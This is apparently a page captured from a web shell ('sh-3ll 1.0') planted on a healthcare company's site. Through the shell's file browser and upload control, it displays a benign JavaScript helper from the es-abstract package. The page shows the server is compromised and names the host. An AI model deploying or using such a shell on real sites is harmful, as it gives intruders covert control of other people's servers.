HOME


sh-3ll 1.0
DIR:/proc/self/cwd/bright.medisavehealthcarebd.com/node_modules/es-abstract/2015/
Upload File :
Current File : //proc/self/cwd/bright.medisavehealthcarebd.com/node_modules/es-abstract/2015/thisTimeValue.js
'use strict';

var $DateValueOf = require('../helpers/callBound')('Date.prototype.valueOf');

// https://ecma-international.org/ecma-262/6.0/#sec-properties-of-the-date-prototype-object

module.exports = function thisTimeValue(value) {
	return $DateValueOf(value);
};